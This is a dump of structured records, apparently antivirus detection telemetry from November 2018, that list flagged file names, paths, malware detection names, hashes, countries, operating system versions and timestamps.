  Row(detection=Row(filename='avscan-20181102-062357-d967c21f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062357-D967C21F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062245-ae6a43b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062245-AE6A43B3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051220-d813b904', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051220-D813B904', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053330-cd71af31', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053330-CD71AF31', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051454-33e6314f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051454-33E6314F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060116-ae09dadb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060116-AE09DADB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T21:20:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060724-8986a476', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060724-8986A476', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060622-64c07b83', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060622-64C07B83', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T19:03:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-065716-28907bfa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-065716-28907BFA', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='78f947ba30f53ea42351886328646ce887fc2bc67957b384bd07e6939c9d281b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:59:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060645-723652c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060645-723652C8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050655-166209c4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050655-166209C4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053312-c27bc5c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053312-C27BC5C5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060722-888741ae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060722-888741AE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051415-1d215f5f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051415-1D215F5F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054722-bd3be8c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054722-BD3BE8C7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050848-5a1fb92c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050848-5A1FB92C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060033-94e5345c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060033-94E5345C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054327-30f1a110', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054327-30F1A110', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-27-21-48-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T20:32:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jan0312-1.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\Borong\\SORE\\JAN0312-1\\JAN0312-1.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:21:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='filerecovery.exe', filepath='\\\\?\\H:\\2018\\Boot.Disk.v12.0.3.BOOTCD-pawel97\\ads1203cr180327\\32\\FileRecovery.exe', filesize=4160000, name='HEUR/APC.#M1.#R1'), hash='52f7cfd0c37429b3b531de2f4499adb07e5d72e28738bf3ed0fbb8b728a6e32d', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T04:17:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=2400000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='313a83ad30e993d19cc51cc281b8ae29526266f1038c59f9a9737c9dadf68376', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T01:00:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lmtools.exe', filepath='F:\\研究生简历\\商家爱玩\\新建文件夹\\尚素英\\新建文件夹\\软件\\CAD2008能用\\AutoCAD 2008安装包\\support\\nlm\\Program Files\\Autodesk Network License Manager\\lmtools.exe', filesize=1536000, name='W32/Ramnit.CD.#M1.#R1'), hash='395114ee221cd21e7a379d6b8270e1bda6eef2df8da115b89328276118d3b545', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=467408, timestamp='2018-11-01T13:13:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154713-69162d64', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154713-69162D64', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:47:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lpa p2k3.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\PROPOSAL LPA\\LPA P2K3\\LPA P2K3.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T00:10:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh22c1', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH22C1', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:32:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered nilid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nilid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3acf7c1425fa9fe9629c4cdaf71a882083cd14a828265aa4a0a21ae3f083965b', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T08:13:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155716-ce856c89', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155716-CE856C89', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='BA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T16:14:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='beetle.bug.3 .exe', filepath='\\?\\J:\\العاب\\Beetle.Bug.3\\Beetle.Bug.3 .exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='12334133514062566687058c3a16fab30e461332f81887d55bf4d876f07458e3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='150774176925071.exe', filepath='\\\\?\\C:\\Temp\\150774176925071.exe', filesize=192000, name='HEUR/AGEN.1031796.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:14:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh6e83', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH6E83', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:32:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dinas.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2017\\RPG GARMENT 2017\\DATA ADMINISTRASI HRD\\SURAT DINAS\\DINAS.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:27:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154649-650c945f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154649-650C945F', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:46:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:35:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='escritura de revogação .scr', filepath='C:\\Users\\X\\Desktop\\escritura de revogação .scr', filesize=320000, name='WORM/Nenebra.A.#M1.#R1'), hash='53a514f013d76540f5daf64de34a640b8a214a9af019a5c257fd562ca7d50ee5', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T11:15:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rmldpcj.exe', filepath='C:\\$Recycle.Bin\\S-1-5-21-869931039-3699065816-470119572-1001\\$RMLDPCJ.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EC', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T03:27:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T02:40:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jkdqry.sim', filepath='\\\\?\\C:\\Program Files\\Simplo\\ArCondicionado\\JKDQRY.sim', filesize=1152000, name='HEUR/AGEN.1020738.#M1.#R1'), hash='dc47672269057a228c028ca22aa75a54cf156c53b54b8398cafde0a19573cd5f', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:06:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='removeassinaturapramim.exe', filepath='C:\\Users\\X\\Desktop\\RemoveAssinaturaPraMim\\RemoveAssinaturaPraMim.exe', filesize=512000, name='TR/Spy.Banker.Gen.#M300.#R3644'), hash='6f1e01d3c6ba1641c7b10604ac1c392b8133912c6b04f8a6d9c4750ebb5c15e6', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:34:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142845-225cbe58', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0916e0be\\AVSCAN-20181101-142705-187CF917\\AVSCAN-20181101-142845-225CBE58', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adobe premiere pro cc 2018 12.0.0.224 x64_ba2e8a34.exe', filepath='C:\\Users\\X\\Desktop\\Adobe Premiere Pro CC 2018 12.0.0.224 x64_ba2e8a34.exe', filesize=294912000, name='HEUR/AGEN.1000587.#M1.#R1'), hash='ad89b75827d2f9c125614f4d7d18aaae981a86dde80d5763cfbeb604a624e869', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T01:43:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsk9195.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:19:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='zbeub finder.exe', filepath='c:\\users\\X\\desktop\\ss tools by matt_ v13\\zbeub finder.exe', filesize=2048000, name='HEUR/APC.#M1.#R1'), hash='b500de581700356962520b312158252db75db6d474ca8fd27f413334d366ed1a', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T16:33:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dark sector v1.1 by enjoy.exe', filepath='c:\\users\\X\\downloads\\dark sector v1.1 by enjoy\\dark sector v1.1 by enjoy.exe', filesize=1088000, name='TR/Strictor.ca41b9.#M1.#R1'), hash='ca41b9db04c6227da715eb34d3bb5e92205ebc187e009ce0e1db2c944efce400', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T22:14:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0161081.dll', filepath='j:\\system volume information\\_restore{2d40b68e-637a-43d2-8b7c-51a8ae33b02f}\\rp183\\A0161081.dll', filesize=1920000, name='W32/Ramnit.CD.#M1.#R1'), hash='72537cf097360d54f80dc5187e01d2ce6dea60070417b93a43dfc7ac963a1d5e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:59:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-191101-8c6475bc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b536a71d\\AVSCAN-20181101-185904-2C8ADBCA\\AVSCAN-20181101-191101-8C6475BC', filesize=1856000, name='TR/Rogue.KDV.795271.1.#M1.#R1'), hash='ec418843efb4baeac8d80b9df6901e4860efda54941b64e346f97f9fde3a8994', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:11:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='a74def86a022a5a6604291ebc49b97e25264f1ceb0a60d40bd3317baea76191e', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T19:50:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='7d80ce121b1fbadf55212514bc6bae4f16436b6a5a751853063ed9b4121c3530', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T07:14:00Z'), dt=datetime.date(2018, 11, 1)),
